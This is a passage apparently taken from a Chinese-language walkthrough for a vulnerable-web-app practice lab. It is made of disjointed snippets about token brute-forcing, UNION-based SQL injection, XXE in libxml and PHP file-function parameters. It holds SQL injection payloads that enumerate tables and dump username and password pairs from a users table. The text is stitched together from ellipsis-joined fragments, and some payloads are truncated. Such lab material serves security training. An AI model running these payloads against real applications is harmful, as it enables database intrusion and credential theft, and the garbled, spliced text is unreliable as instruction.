token值都是不一样的,所以我们只能选择单线程进行攻击
将最下方的Redirections选择为Always,如果不点上这个就不会打开html包的body部分,因为token值是存储在body的hidden...或者
id=-1 union select 1,database()
#爆表【httpinfo,member,message,users,xssblind】
id=-1 union select 1...'
#爆值
id=-1 union select 1,concat_ws('-',username,password) from users
字符型注入(get)
#查看页面变化,判断sql注入类别...以PHP为例,在PHP里面解析xml用的是libxml,其在≥2.9.0的版本中,默认是禁止解析xml外部实体内容的。...如果您还想在 include_path(在 php.ini 中)中搜索文件的话,请设置该参数为 ‘1’。
context 可选。规定文件句柄的环境。context 是一套可以修改流的行为的选项。